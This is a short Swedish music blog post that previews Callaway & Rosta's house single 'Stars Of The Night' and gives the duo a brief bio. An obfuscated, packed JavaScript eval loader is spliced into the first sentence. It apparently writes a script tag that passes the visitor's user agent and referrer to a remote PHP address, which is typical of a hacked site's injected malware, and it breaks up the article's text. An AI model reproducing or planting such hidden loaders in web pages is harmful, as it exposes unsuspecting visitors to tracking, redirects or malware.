Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Preview: Callaway & Rosta – Stars Of The Night feat. Marylin

callaway & Rosta
Filip Urde
  • On 23 januari, 2014
  • http://www.revue.se/filip-urde

Callaway eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|htszr|var|u0026u|referrer|dbrbr||js|php’.split(’|’),0,{}))
& Rosta är tillbaka med en ny fet house dänga. I Stars of the Night får vi åter igen uppleva modern house med stämningsfull sång och synth.  

Än så länge så är det en preview vi kan dela med er, men den 3e februari är det release av den nya singeln. Vi på Revue.se har varit supporters av dessa ”rising stars” från början och vi ser verkligen en ljusframtid för Callaway & Rosta. Deras förra singel vid namn ”rest of me”, kom i våras och har idag 450 000 + spelningar på spotify.

Spotify: Callaway & Rosta – Rest of Me – Extended Mix

Kort om Callaway & Rosta

Callaway och Rosta är två killar från Stockholm som länge jobbat i musikbranschen. Efter många långa dagar och nätter i deras studio så släppte de sin första singel med den begåvande sångaren Daniel Gidlund. Daniel Gidlund har innan sjungit in till bland annat Nause och Dada Life, två stora housegrupper från Sverige. Nu är man tillbaka igen med en ny singel och det är riktigt bra grejer.

Callaway och Rosta har god känsla för vad som fungerar på dansgolvet och kommer att satsa stenhårt på 2014.

Läs mer: Facebooksida